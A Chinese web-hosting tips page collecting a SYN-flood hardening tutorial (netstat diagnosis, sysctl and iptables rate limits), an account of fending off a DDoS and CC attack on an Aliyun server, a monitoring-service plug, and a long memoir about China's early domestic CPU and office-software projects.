Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### 一次SYN攻击之战 Linux服务器防护SYN攻击经验教学 这篇文章主要介绍了linux 防御SYN攻击步骤详解,本文适用于懂些linux系统维护的朋友学习,不适合新手。新手建议用百度云加速或者高防IP(需要的联系主机吧) 今天早上一到公司登录公司官网的时候感觉挺慢,登录服务器查看官网访问情况:[aliyunzixun@xxx.com~]#netstat-anp|awk'{print$6}'|sort|uniq-c|sort-rn172ESTABLISHED59CONNECTED589SYN_RECV15STREAMSYN居然这么高,继续追查是那些ip发出的SYN:[aliyunzixun@xxx.com~]#netstat-an|grepSYN|awk'{print$5}'|awk-F:'{p 今天早上一到公司登录公司官网的时候感觉挺慢,登录服务器查看官网访问情况: [aliyunzixun@xxx.com ~]# netstat -anp |awk '{print $6}'|sort|uniq -c |sort -rn 172 ESTABLISHED 59 CONNECTED 589 SYN_RECV 15 STREAM SYN居然这么高,继续追查是那些ip发出的SYN: [aliyunzixun@xxx.com ~]# netstat -an | grep SYN | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | sort -nr | more 570 x.x.x.x (ip 就不写出了,是山东枣庄联通的一个ip),只是这一个ip就发出了这么多的syn请求连接,本来我们web服务器的并发数不是很高,这样一来正常的用户请求得不到相应,页面无法打开。因为硬件防火墙归集团IT部管理,我没有权限,所以只能在本地服务器上做些措施对SYN攻击进行部分减缓。 首先说一下SYN的攻击原理: 在TCP/IP协议中,TCP协议提供可靠的连接服务,采用三次握手建立一个连接。 第一次握手:建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SEND状态,等待服务器确认; 第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态; 第三次握手:客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包发送完毕,客户端和服务器进入ESTABLISHED状态,完成三次握手。 完成三次握手,客户端与服务器开始传送数据. 如果用户与服务器发起连接请求只进行到第二次握手而不再响应服务器,服务器就会不停地等待用户的确认,如果过多这样的连接就会把服务器端的连接队列占满就会导致正常的用户无法建立连接。所以我们直接从SYN的连接上进行如下改动: 查看linux默认的syn配置: [aliyunzixun@xxx.com ~]# sysctl -a | grep _syn net.ipv4.tcp_max_syn_backlog = 1024 net.ipv4.tcp_syncookies = 1 net.ipv4.tcp_synack_retries = 5 net.ipv4.tcp_syn_retries = 5 tcp_max_syn_backlog 是SYN队列的长度,加大SYN队列长度可以容纳更多等待连接的网络连接数。tcp_syncookies是一个开关,是否打开SYN Cookie 功能,该功能可以防止部分SYN攻击。tcp_synack_retries和tcp_syn_retries定义SYN 的重试连接次数,将默认的参数减小来控制SYN连接次数的尽量少。 以下是我修改后的参数,可以根据自己服务器的实际情况进行修改: [aliyunzixun@xxx.com ~]# more /etc/rc.d/rc.local #!/bin/sh # This script will be executed *after* all the other init scripts. # You can put your own initialization stuff in here if you don't # want to do the full Sys V style init stuff. touch /var/lock/subsys/local ulimit -HSn 65535 /usr/local/apache2/bin/apachectl start ##### sysctl -w net.ipv4.tcp_max_syn_backlog=2048 sysctl -w net.ipv4.tcp_syncookies=1 sysctl -w net.ipv4.tcp_synack_retries=3 sysctl -w net.ipv4.tcp_syn_retries=3 为了不重启服务器而使配置立即生效,可以执行 #sysctl -w net.ipv4.tcp_max_syn_backlog=2048 #sysctl -w net.ipv4.tcp_syncookies=1 #sysctl -w net.ipv4.tcp_synack_retries=3 #sysctl -w net.ipv4.tcp_syn_retries=3 也有的人喜欢用访问控制列表来防止SYN的攻击,在一定程度上减缓了syn的攻击: Syn 洪水攻击 #iptables -A INPUT -p tcp --syn -m limit --limit 1/s -j ACCEPT --limit 1/s 限制syn并发数每秒1次 防端口扫描 # iptables -A FORWARD -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT 死亡之ping # iptables -A FORWARD -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT #>iptables-save >/etc/sysconfig/iptables 进行查看,#iptables -L ACCEPT tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/SYN limit: avg 1/sec burst 5 ACCEPT tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/RST limit: avg 1/sec burst 5 ACCEPT icmp -- anywhere anywhere icmp echo-request limit: avg 1/sec burst 5 再次进行查看syn连接: [aliyunzixun@xxx.com ~]# netstat -an | grep SYN | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | sort -nr | more 20 10.92.10.220 1 125.43.36.199 明显SYN连接数已经下来了。 以上是一次SYN攻击之战之Linux如何防SYN攻击的内容,更多的内容,欢迎关注主机吧站长教学网。   #### 一次阿里云服务器被 DDoS攻击 经历 1. 网站是放在阿里云 ECS 上的, DDoS 攻击后网站不能访问。从阿里云的后台看到流量在 15G 左右,网站服务器进入了阿里云的黑洞。 40 分钟后网站从黑洞里出来,瞬间又遭受攻击并打入黑洞。接下来的 3 个小时一直重复这个过程... 2. 因为已经严重影响业务了,所以购买了阿里云的高防 IP 。 DNS 解析到高防 IP 后,通知客服更换源 IP 。本以为高枕无忧,结果刚过了 10 分钟,网站又被打入黑洞。 攻击者应该是找到了新的源 IP ,直接攻击源服务器。因为高防 IP 到源 IP 走的是外网,所以源服务器进入黑洞后,高防 IP 无法连接源 IP ,导致网站又不能访问。 3. 发工单咨询了阿里云客服,答复是 使用负载均衡 ELB ,即 高防 IP->负载均衡->源 IP 。负载均衡作为桥梁,与高防 IP 走外网,与源 IP 走内网,这样即便源服务在黑洞中也可以访问了。 4. 对方发现 DDos 无效后,开始了 CC 攻击,网站又陷入了瘫痪中。检查以后发现 Mysql 连接数过多,而且连接状态绝大多数是 Sleep 。查看 php 的 slowlog ,找到了原因:源服务器某些页面需要对外请求微信服务器,因为不能访问外网, php 程序阻塞住了,对 Mysql 的连接不能释放。 5. 修改代码将微信和 QQ 相关的连接做了一个代理,对方是无法找到这个代理并打入黑洞的。 6. 攻击者开始变本加厉,最高时流量在 30G , QPS 有 2 万多,网站大量出现 502 错误,看来我蹩脚的 PHP 代码已经扛不住了。 nginx 日志显示其请求的网址比较固定,于是将这些页面做了静态化处理,并将非法的 POST 请求 ban 掉。哈哈!网站正常了。 有一些经验教训,供大家参考: 黑洞有一个触发值,默认是 5G ( 5GB 的阈值可以根据安全信用增加)。因为之前网站的安全信用很好,以经提高到 12G 了。黑洞的时间最短 40 分钟,最长 2 个半小时。整个攻防过程中,网站的信用评级直线下降,阈值降到 5G ,黑洞时间也延长到两个小时。 阿里云 ECS 是不能更换 IP 地址的,除非购买他们的高防 IP ,可以免费更换一次(后来发现实际可以更换多次)。 DDoS 在自己的服务器端是无法防御的,无论是设置安全组还是防火墙,只能去购买高防 IP 或者 CDN 。不过根据这两天的攻击来看,无论是阿里云高防还是 CDN ,在大流量的攻击下,源 IP 还是会暴露的。 DDoS 确定是竞争对手所为,但不想 DDoS 回去。不能助长这些黑产,也不能像别人一样 Low 。作者: vimrus来源:V2EX #### 一款非常值得推荐的网站应用监控平台:灵雀应用监控平台 想要监控一个网站或者APP运行是否正常,是一件非常麻烦的事,目前国内有很多公司提供监控服务,不过大多都是收费的,不过也有免费的,比如灵雀应用监控平台。 就是一款免费的监控平台,可以监控网站、APP等应用,非常不错的,主机吧试了下,非常好用。 可以监控网站异常、网站应用性能、网站外链等。 演示:https://perf.51.la/analytics/overview/0 官方地址:https://perf.51.la/ 安装也非常方便,支持JS代码接入也支持SDK接入。网站一般用JS接入,类似于安装统计工具一样。 好东西,别埋没了,如果你也有网站、APP监控需求的话,不防试试。 #### 一段关于国产芯片和操作系统的往事 中兴事件引发一片网络热议。什么“这次被美国卡住的芯,一万年也要搞出来”、“中国芯老炮:缺芯是因为缺钱”“国产操作系统,要靠BAT”……这种言论看得我胸痛。 忍了几天,今天忍不住了。说说自己经历的一段往事。 不知不觉写了一万字。分几个部分: 辉煌开局、第一第二棒的困难、系统生态的困难与大溃败、复盘方舟和永中错在哪里、为什么我们做不出操作系统。 2000年到2002年,3年时间,我作为倪光南院士的助手,参与了方舟CPU、永中Office、NC瘦客户机和Linux操作系统的工作。 辉煌开局 2001年,方舟1号横空出世。被媒体称为“改写了中国‘无芯’的历史”。 科技部863重大专项、计委重大专项、信息产业部产业扶持基金全都给了钱。方舟1号的技术鉴定委员会由中国工程院出面,前任院长宋健、前任副院长朱高峰亲自担任鉴定委员会正、副主任。 2001年7月10日,方舟1号发布,北京市前副市长刘志华亲自当发布会主持人,曲维枝部长等几个部长都到了现场发言。之前,还有李岚清副总理3次听取工作汇报等。 这就是当时方舟1号CPU得到的待遇。最高规格人、钱支持,全到位了。 我从2000年开始参与方舟的项目。呈送863、计委(现在叫发改委)、信产部申请支持的报告,我都是执笔人。技术鉴定会、新闻发布会都参与筹备。 难以忘记2001年4月,第一批流片回来,紧张的调试之后,我们看到自己动手设计的CPU启动工作了。刘强看着我眼睛说:“芯跳了”。 那一刻,难以忘怀。或许,这是那件事里,最美好的一瞬间。 方舟科技是加拿大华人李德磊创办的企业。 李德磊1977年从哈尔滨工业大学毕业后来到中国科学院研究生院读研,后赴加拿大阿尔伯特大学读博。然后就留在加拿大。 1997年1月8日,方舟科技的前身百拓立克公司在京注册成立。主要靠李德磊介绍外包业务。 1997年,离开摩托罗拉的李德磊加入日立(美国)半导体公司,担任微处理器设计总监,与此相对应,BBT承接的外包业务也从摩托罗拉转向后者,主要做基于日立芯片的相关业务。刘强那个时候博士毕业,加入任研发副总裁。 1999年,李德磊找到倪光南,倪光南看到这里磨练了一支做CPU的完整技术队伍——这是他梦寐以求的。 当时的背景是,中国IT产业界,以及倪光南本人一直为没有自主知识产权的操作系统和芯片耿耿于怀。(18年了,还是如此) 当时的科技部部长徐冠华曾说,“中国信息产业缺芯少魂”。其中的芯是指芯片,魂则是指操作系统。 于是,倪光南帮方舟找钱、找政府、找中芯需要的一切资源,而他本人没有从中芯拿一分钱,零股份。他愿意付出一切,他想要一个新的IT产业核心框架。 倪光南院士给我讲方舟CPU+Linux操作系统,做成瘦客户机NC,“云+端”解决方案,替代Wintel架构的时候,我当时兴奋得紧紧攥住拳头,指甲掐进肉里。 我们以前在联想,玩的是Wintel联盟(微软与Intel联盟)设计好的游戏。 Wintel就是你的顶层,你的成本与性能只能在它框定的空间里。 而现在,我们这群人,正在动手改变核心框架。给我们的IT产业带来完全不同的,成本与性能的想像和设计空间。这件事简直太棒了啊! 第一棒和第二棒的困难 那是激情燃烧的岁月,敢为的俞慈声任北京科委副主任。曾被邓小平关注的李武强从美国回来在科技部产业化司任副司长。大家都想做事情。 我们有了CPU与SOC的技术,政府给的钱也到位了,芯片也做出来了。 下一件事,就是面向市场面向用户了。 这时,真正的困难才开始。 做CPU最难的不是开发。 第一步,你不是写不出INTEL那样的设计,而是你打不起官司。欧洲从工业革命开始,就认识并懂得保护知识产权的价值,以激励知识创新。美国青出于蓝。只要是个Idea就可以注册专利。专利保护,是Intel的核心竞争力之一,Intel长期大规模的专业律师团队,几乎把X86体系相关的专利全注册了。 为什么还有AMD。INTEL是IBM的股东,IBM是AMD股东。就是这样。 所以对方舟的团队来说,不是X86体系的技术难度高,而是在这条道路,每一步,你都会遇到INTEL的专利。我们打不起官司。所以,倪光南做的技术路线选择是,走RISC结构,做嵌入式,绕开X86体系。 接着第二难的是,在2000年之初,中国IT产业不但做不出CPU,而且连基于CPU,自己动手设计核心电路板的能力都没有。那时,中国还有电子产业企业百强的名单。我们联想排第二。 反正背后有倪光南、有宋健等一堆大佬,我拿着中国电子企业百强名单,从第1名找到第100名,找了每一个大公司的总工程师。 对话永远是这样: 我:“我们有自主知识产权的CPU,我们还有SOC的能力,这样,我们可以极大地把你要的功能集成,贵司可以更灵活地定义你产品的性能和体积。” 对方:“哎呀,对不起。我们没有能力基于一块CPU开发产品原型。都是INTEL或者他的Design house做好公板,我们选一个,然后基于他们的公板我们再开发。” 我们这才发现,Intel不是做出了CPU,而是培育了一个基于CPU的开发生态系统。 第一棒是核心元器件。 第二棒是无数小的Design house围绕Intel做公板、做产品创意、做产品原型、做差异化做优化。 然后,下一棒才是,面对市场的企业,从Design house挑选产品原型,做商品化包装。投放市场。做品牌、做销售、做客户服务。而2000年的时候,我们的电子产业百强,基本上都是第三棒。所以,当我们做出CPU,而且芯跳了。 我们把它捧到手上,想献给别人。中国没有一家第三棒企业能接。 没有办法,只能向前。 于是方舟科技在做完CPU后,又建立硬件团队,自己做出了NC的产品原型,做出了公板。 等于一家本来就规模很小的CPU设计公司,还必须同时干Design house的活。 终于CPU和产品原型都OK了,可以交付一个第三棒企业商品化运作了。 俞慈声拍板,北京政府第一个吃螃蟹。 系统生态的困难——大溃败 下一个问题来了。更大的难题。Wintel联盟。勉强绕过Intel,更难突破的是微软。 CPU做出来了,再自己做原型,然后自己做产品。做完产品,发现没有配套软件可用。一块NC公板,方舟科技咬咬牙就自己干了。但是那么多的软件移植、适配、二次开发,真不是1家、10家、100家公司干得完。 这时俞慈声发起了“扬帆计划”,针对Linux桌面的13大类50多个问题,在全国进行招标。浏览器、OFFICE、播放器……一项一项解决。 接着,就干了那件圈子里著名的事——北京市政府办公软件选型,把微软踢出局。 那件事IT圈轰动一时,微软中国总裁高群耀辞职。然后基辛格给当时是北京市长的刘淇写信,为微软说情。施压处置俞慈声。(没想到吧,美国大政客也为自己国家企业服务的。那时中国刚刚申奥成功,基辛格的施压,是大BOSS级杀伤力)。 那是2001年的冬天,北京最大的一次雪。那一天,十余个院士联名上书总理,为俞慈声说情。已经过世的中国计算机事业创始人之一、中将、两院院士张效祥第一个签字,倪光南院士也签了名。据说朱总理看到十余位院士的联名,一时动容。863计划,来自1986年3月,4位院士联名上书邓小平总书记。因为时间发生在是1986年3月,所以简称863。从此这就是中国高科技发展重点计划。启动863是4个院士联名。保俞慈声,有十几个院士。我一直记得这件事。 后来赋闲在家,看《圣斗士星矢》,12黄金圣斗士为了打穿叹息墙的一线光,一起赴义成仁。十几个院士签下自己的名字,对他们没有任何好处。他们只是想守护一线光。 所以,我不愿意回忆这段往事,因为我们失败了。从此我们成了很多人的笑柄。尤其是倪光南院士。这是10年后,我加入腾讯以后,才学会的一个词——用户体验。这一仗如果简单来说,就是我们搞定了总理,没有搞定用户体验。 结果是溃败如山。 第一个要命的问题,是基于Linux的Office,包括Red Office、永中、WPS与微软的文档格式兼容问题。我们都知道,换了OFFICE打不开历史文件,打不开别人给你的文件,这是要命的事。 2003年,俞慈声又搞了启航计划。召集中国的所有Office高手、还邀请了韩国的HancomOffice、日本的一太郎技术人员。中日韩三国高手一起破解微软的文档格式,以期能读能存。 效果不好。 除了文档格式,其他的软件体验,用户各种不爽,那就太多了,大家用脚趾头想一下就好了。用户普遍怨声载道,要求换回Wintel。 就这样,我们失败了。后来,方舟CPU停止开发。永中破产清算。那几万台政府为了扶持一个产业,而买单的NC,估计早就卖了废铁。 几年后,比尔盖茨自己公开了Office的文档格式。我看到这个新闻的时候,感觉自己脸被门板夹了。我通过视频,看着这个在哈佛毕业典礼上开玩笑说“爸爸,我终于拿到毕业证啦”的人,这个退休后做慈善的人,会在做《时代周刊》值班编辑的时候选个患病的男孩当封面人物的人。我想这个人是天使还是魔鬼。他真的做了很多好事。可是他压得整个中国没有了通用软件产业。 当个小商人,世俗的成功挺容易的 03年,我离开了倪老师的联盟,走得非常难过,觉得自己是一场伟大牺牲战里的逃兵。 08年,我创业做网站的时候,一个小孩晚上闲着,装了最新版的红帽子桌面。我从旁边经过,一眼看到,就停下来,然后就用。试试这个试试那个,心潮起伏,恨不得大哭一场。如果2002年,桌面能有这个水准,这一大票人,应该不会输得那么难看吧。 离开倪老师后,颓了一年多,那段时间,不少人找我干活,多半两类事情,一类是“我代理了个产品,你帮我在中国建设一下渠道”。或者“我做了个产品,你帮我跑跑政府关系”。这两类事,我都再也不想做了。可是除了这个,我并不会别的。 后来,我投奔王路。我跟他说:这么多年,我学的东西,只有给一个特别大的系统干活才用得着。我想在你这里,学点能养家糊口的具体本事。 后来,王路让我当一本准备关门的数码杂志的总经理。 我从王路那里出来,给雷军打了个电话。说:“我要上班了。” 雷军让我去他办公室找他。问我做什么。 我给他看手中的杂志,说做这本杂志的总经理。 雷军说:你为什么要干这个? 我说:找不到工作。 雷军说:可是你为什么要做这个? 我说:学点一个人也能做的,能养家糊口的小本事。 雷军说:那你就干这个吧。 杂志的总经理,其实就是广告销售。 以我给计委写重大专项数亿提案的素质,给广告客户写个三五十万的广告提案,应该算不难。 第一次一个客户提出要回扣。我不能确认难道这就是要钱?但是想想,还是试着给吧。 我请这个客户吃了个饭,拿了个信封。一顿饭,俩人都心不在焉,都不是为了吃饭和交流。然后我把信封递给他,他没有任何推辞客套,极为流畅地收到兜里,告辞而去。 那天晚上,我流了好久的眼泪。 以前,我每天起早贪黑去努力,是为了友谊和荣誉。 从此,我做的事情,没有半毛钱荣誉可言,只做一个拉广告给回扣的小买卖。 后来,我学着做网站,后来,我把网站卖给腾讯,后来…… 10年过去了。 世人眼中,我算是成功了。 倪光南院士还在坚持 2014年初,我离开腾讯。 办完手续,我给倪光南院士发了个微信:倪老师,我离开腾讯啦。倪老师回说,你来找我一趟,我这里正好有个事情。我就去看他。 2013年政府采购,研究对Win8的策略,咨询到倪光南院士。倪光南院士直接上书习 总书记,直言建议:“基于共享软件架构,开发发展中国自主可控的操作系统。” 倪光南院士的报告正文不到800字,总书记手写批示了200多字。“计算机操作系统等信息化核心技术和信息基础设施的重要性显而易见,我们在一些关键技术和设备上受制于人的问题必须及早解决。” 十多年过去了,经历过失败、非议,他自己向科技部负荆请罪种种,倪老师还在坚持。 14年初我去看他,他身上穿的那件棉服,还是2001年的那一件。倪院士依然信任我,直接拉我和他最核心的几个人一起商议该如何推动,在移动场景下的自主可控操作系统。10年过去了。打败微软的是Google和苹果。微软还是那么强,只是PC时代结束了。俞慈声、李武强都已经退休。李德磊不知所终、永中破产清算。 刘强05年离开方舟成立了君正,并于2010年IPO。现在360摄像机、小米手表等多款芯片用的多是刘强做的。2000年倪光南院士对方舟CPU的投入,还是有了成果产出。 华为买了ARM的授权,做出了海思芯片。小米也豪掷几个亿开发了松果处理器。 就像10多年前一样,只要搞定知识产权问题,选择技术路线,找会干的人,投入干,CPU/芯片就能够做出来。搞不定的依然是操作系统。差距大的依然是生态。 当年,绕得过Intel,跨不过微软。 如今,绕得过Arm,做不出安卓。 那一段,跟着倪老师,参加了几场高端的会。满场朱紫,还说着14年前的话语体系。 我发现自己变了。在类似的场子里,今天的我和14年前的我,感受完全不同。 过去10年,我没有给一个领导汇报过工作,没有一分钟的时间,用来揣测领导意图。 我只需要持续做一件事,就是洞察用户需求,优化用户体验。 这和在系统里做事,是完全的两个方向。 第二次,我又离开了倪老师。我当时认为自己可以直接判断,这事做不成。 就是说如果做法不改变,也许还是可以拿到很多钱,很多资源、批到地,盖起楼,但是做不出操作系统的生态。 安卓有三: 1、不断迭代优化的安卓系统本身 2、现在大家已经非常习惯的基于安卓的各种应用:微信、商务、游戏、生活、娱乐…… 3、全球无数团队,基于安卓在源源不断地创意,开发新的应用,不断繁荣、优化这个生态。 15年前,做当时桌面办公应用的移植,已经让那群勇士折戟沉沙。 现在,数量远大于过去几个数量级的应用移植,还有更为庞大丰盛的生态。 还是原来的体制,还是原来的套路。 面对更大的一仗,完全没有赢的机会。 从一个公司辞职,与离开一个人,不再陪着这个人,支持他的理想,是完全不同的感受。 我从联想辞职,从腾讯辞职,都可开心了。 但我一直为第二次离开倪光南院士而深深愧疚。那时他已经75岁。这是他一生的梦想。我是他喜欢并且信任的弟子。我没帮他。 复盘方舟和永中 今天再复盘,十余年前方舟和永中做错了什么。 先说方舟。 首先方舟科技,是李德磊个人的公司。李德磊开这个公司的目的,是赚钱,他的选择自然事什么能赚钱做什么。 倪光南看上了这家公司的人才储备和Know how储备,拉上了自己的全部人脉与信用,希望通过一个项目,让方舟的人才储备和Know how储备凝结成可持续发展的IT系统底层。 这件事错在哪里? 就是我在我的《产品思维30讲》里,提到的组织原则。 顶级组织至情至性, 一流组织共同信仰, 二流组织共同利益, 三流组织共同规则。 所以,用这个组织原则我们来看一下为什么李德磊背信弃义。 首先,李德磊与倪光南的关系,至情至性,肯定没有。共同信仰,更是没有。共同利益,还也没有。李德磊要的利益是个人收入最大化。倪光南要的利益是让方舟的人才储备和Know how储备凝结成可持续发展的IT系统底层。 所以,二人合作的基础,就是在倪光南能够持续满足李德磊的利益诉求的情况下,大家可以“共同规则”。也就是说,一旦,李德磊对倪提供给他的利益不满意了,规则就顿时对不齐了。 所以,后来NC的市场起不来,李德磊立刻对863违约,转而做其他业务赚钱。当然李德磊把一些事处理得非常难看,更令人诟病。 但其实从根本上,李德磊与倪光南就不是一个可共谋大事,扛大压力的组织。 如果说方舟的问题是组织基础,永中的组织核心其实很好。章燕青与曹参何止共同利益、共同信仰,简直是至情至性。永中的问题是产品定义和用户体验。还是我的《产品思维30讲》里,用一节课讲用户价值公式。 这个公式其实是俞军提出来的,我深以为然。 用户价值 = ( 新体验 - 旧体验 ) - 替换成本 你要得到一个用户,依靠的工具是用户价值。用户得到价值足够高,他就会迁移。比如:几亿用户很流畅地从短信迁移到微信上。 什么叫得到一个用户。我们曾依靠政府指令,把永中Office装到数万政府公务员办公电脑上,我们得到这个用户了吗? 好,先算算永中Office给用户的价值是多少。 如果微软的office软件使用体验90分,价格体验50分,两项一乘,微软office软件带给用户的旧体验算45分。 永中Office使用体验70分,价格体验咱们算90分,两项一乘算63分。永中Office,自己可以单方面说,自己带给用户的新体验算63分,比微软好。 可是还有替换成本啊,用户的替换成本包括什么?品牌认知、获取成本、学习成本、使用成本,使用成本包括使用过程中遇到问题可以得到及时帮助等。 我们知道,比尔盖茨长期是世界首富,微软公司的品牌、渠道、产品成熟度、客服服务系统,包括网上随处可见的用户分享等,还有我前面谈到的文档格式兼容的问题。用户替换成本其实挺高的,我们往低里算,用户的替换成本是20分吧。 那么用户价值=新体验63分-旧体验45分-用户替换成本20分=负2分 就是说我们使劲偏心地给永中Office打高分,给微软打低分,无视用户迁移成本,而用户几乎没有得到新价值。根本够不成用户迁移的意愿。 同时,我们需要注意,政府采购是单位付钱。所以,实际使用的用户对价格体验其实是无感知的。 所以,如果以用户感知的体验来打分是: 永中的用户价值=70-90-20=-40分 事实上,比这个分数还要低。 你以“爱国”绑架,让用户价值下降那么多,用户怎么不怨声载道。找各种理由回到以前的舒服境遇里。 曹参对永中的核心竞争力定义为“数据集成”。 他分析说“微软Office软件有着相当明显的缺陷:Word、Excel和Power Point是三个独立的、无法集成的应用软件。 如果把文档处理、电子表格以及幻灯片制作集成在同一个程序里,那么用户修改了文档里的数据后,电子表格和幻灯片里相应的数据会自动修改过来,不需要用户再亲自逐一找出必须修改的地方。” 我去!一个数据要同时在Word、Excel和Power Point被引用,这是一个非常非常低频的应用场景好不好? 我刚刚回忆了一下过去5年,我自己的文档操作,用不到一次“数据集成”。 在永中,曹参是无可争议的产品核心,章燕青无比支持曹参,永中上下无比团结奋斗。倪老师当时带我去永中的路上,对永中的集体奋斗精神赞不绝口。 (当时我们在等车,倪老师说“给你买个冰激凌吧?草莓的怎么样?”唉,为了这个冰激凌,我两次离开他都对不起这个冰激凌。) 回到永中,永中的问题是,没有花足够的注意力,在用户最高频的使用场景中,提升用户体验。 反而花了最核心的力量,为了一个用户5年也用不到一次的场景使劲下功夫,还为此沾沾自喜。 我在网上看永中的结局和曹参的回忆,曹参把怨恨放到了收购永中的唐敏等人身上。 其实不应该。永中因为欠债1000万人民币,被破产清算。 1000万人民币,北京一套普通房啊。如果产品的用户价值清晰正向,筹1000万人民币,不难啊。 永中有坚实共同扛压的组织,有很好的开局,也做出了7、8成的产品。但是败了。 曹参的回忆文章里,有对自己创新点的自诩,有对对手的怨恨,但是没有完整的用户场景、用户体验地图、用户价值。 马化腾说:产品经理不能为了自己的自尊心而战。 改变体制的考核方式,才有可能培养创新生态 复盘了我对方舟和永中这两个十余年前的明星企业,核心败局点的理解。 那时我们确实犯了错。我们在组织设计、用户洞察、用户体验等多方面都错了。 但是政府一次重大项目支持失败,十几年后,中国还是没有芯片和操作系统,这不是我们的错。 再尝试探讨一下,为什么二十几年过去了,我们有了数不清的高楼大厦,很多县城都建设的跟北京似的,我们有了新四大发明。 但是我们还是没有操作系统。 在信息社会的国际空间里,中国是个网络强国。 不过这个网络强国架构在微软的Windows和Google的安卓上。 2014年,我陪倪老师参加一次好像挺高端的“移动操作系统生态研讨会”。 我说,我们国家如果真的想要一个“移动操作系统生态”,其实挺清晰和明确的,就是国家出钱,投种子,一年往市场里撒1000亿,连撒5年钱。允许大面积失败。在场官员然后就谈到了如何从科技园拿地做高政府投资的资产,以保证投资成果…… 我无语。然后退出。 为什么我们建的了房子,放的了卫星,但是做不出操作系统?这其实和联想把Wintel框架的PC卖到全球第一,但是不能向内再走一棒,去做核心技术,也不能向旁边再走一步,拥抱互联网和移动互联网。 原因是一样的。 就是体制的集体心智模式,高度依赖确定性。在确定性的框架内,内部人才高度竞争、不能容纳失败。结果就是过度管理。所有的人都以确定确定再确定为荣。不确定是恐惧,是慌张。失败,是羞耻,是污点。而创新、创意,从萌芽到长成,就是与不确定与失败的一路相伴。 这是联想还是我们的体制,恐惧和不能容忍的。而市场导向的企业呢,他们跟着用户走,跟着市场走。 14年,倪老师再次推动移动操作系统,让我和腾讯谈,能否把微信移植到自主可控的操作系统上。我马上找了腾讯的大佬,讲了有总书记手谕的事,然后问微信能不能移植。腾讯人的反应与我预期一致:我们跟着用户走。没有用户量,工作没法安排。 所以,有篇文章《国产操作系统要靠BAT》,指望每个季度得发财报支撑股价的上市公司?别扯了。 方舟和永中拿了多少钱 今天,回头看,被视为重大失败,折了无数英雄的方舟、永中项目,一共投了多少钱呢? “方舟3号”研发经费拨款1538万元,如按照“863课题”的项目预算要求,给科研人员的工资部分不得超过15%,约230万元,那么方舟公司参与研发的近60位工程人员每月工资也就2千多块钱。 按照科技部有关科研资金使用的相关政策规定,用于工资、劳务费、单位提成等方面的资金,在事业单位不超过5%,科研转制企业不超过10%,企业单位不超过15%。“863课题”如果是给高校来做的,15%给科研人员发奖金很正常,但是公司做课题这么15%发工资肯定不够。 李德磊的说钱太少了,根本不够发工资。然后遭到“863”专家的嘲笑。这位专家解释说,芯片项目资金主要用在流片和EDA工具上面,人员工资只是小头。 无视市场的人才争夺,市场定价。以维护官家定的规则为中心。我就是这样要求。你做不到,你就是错的。 无视市场,无视人性啊。 刘强、我这样的人。我们干点容易的事,很容易过得不错。如果找到我们这样的人,让他们干最难的事,还要给最少的钱。我们的官员为何这样理所当然。 永中呢? 曹参自述:自2000年到2008年,永中科技获得政府拨款达8000余万元,投在产品研发上的资金达1.52亿元。同一时期,产品销售收入仅5000余万元,公司累计亏损了5000余万元。 这就是我们国家对CPU和Office最大的重大专项投入。 是不是一堆90后投资基金经理看了都笑了? 我们有新四大发明:高铁、扫码支付、共享单车和网购。 我们用脚趾头回忆一下,这新四大发明是烧了多少钱烧出来的? 不用回想千团大战、不用回想打车补贴大战。2018年,把同龄人甩在身后的那个摩拜单车,一个单车公司烧了100亿。 一家公司烧了100亿,共享单车烧了数百亿,成果是,每个城市可以骑共享自行车。 为了中国自主知识产权的CPU+操作系统+核心办公软件,一共烧了多少钱? 把当年变成废铁的NC全都算上。 20亿,有没有? 这件事,这个数字,就成了恐怖记忆。 然后,所有的公司、所有的官员,全都吓破了胆。 十几年后,国家为中兴支付罚单。一笔8亿美金。 但是,这些钱,国家付出来,官员没有错误。这就是我们的体制选择。 会犯错的事,没有人再敢干了。十几年前,李武强以不怕丢“乌纱帽”的姿态站出来。这种“傻子”,十几年,也就那么几个吧。何况几个傻子还失败了。前车之鉴啊前车之鉴。 谁的妄境,谁的羞耻 所以,我说政府要操作系统。需要的,不是投资一个团队,而是烧钱烧出一个生态。就是烧钱。容忍失败。 战国时期燕昭王于易水之畔筑黄金台,招天下之士,谁有能力,现场抽一块黄金与之。市场与人性如此,我们何苦自欺欺人。 人家一自行车烧100亿,我们一个国家的操作系统,复杂庞大的生态,需要无数人参与。难道您打算,确定性地投几个公司,少少给上几个1500万,然后去打安卓? 这是谁的妄境? 为什么说挑战安卓比挑战微软还难? 因为今天,基于安卓的生态更庞大、更繁荣、更高频。 从办公、商务、生活、娱乐。一个个人以及企业的数字空间,几乎都可以利用手机完成。我们对移动场景的依赖,远远大于桌面。 微软OFFICE投了多少钱? 微软是上市公司,公开财报,2016-2017年度,微软一年的研发投入是124亿欧元。1000多亿人民币。 微软一年研发投入1000亿人民币。我不知道这中间,多少钱用于OFFICE。 但是无论如何,永中8年花了1.5亿,挑战失败,成为重大污点。 我不知道这是谁的妄境,谁的羞耻。 18年前,倪光南院士和我叹气:“纯计划经济也好,纯市场经济也好。都能做出大东西。” 18年后,2018年倪院士已经79岁,还在为了中国自主可控的芯片与操作系统奔走呼吁。 世人眼中,他是一个唐吉柯德。被柳传志逐出联想,曾经推动的重大项目未能完成。为了这个梦想被一个又一个人利用。 而他明知道自己在被人利用,还是宁可冒着一世英名赴水流的风险,还是继续尝试、继续努力。 不作为,无过错的人们嘲笑他:“不识时务”、“老被人骗”、“被人骗了还在继续做”…… 然后所有人,继续直接间接地为“无芯”买单。 我不知道这是谁的妄境,谁的羞耻。 结束语 这段往事,因为充满了激情、失落、怀疑、愧疚种种复杂的情绪,所以我非常不愿意回忆。 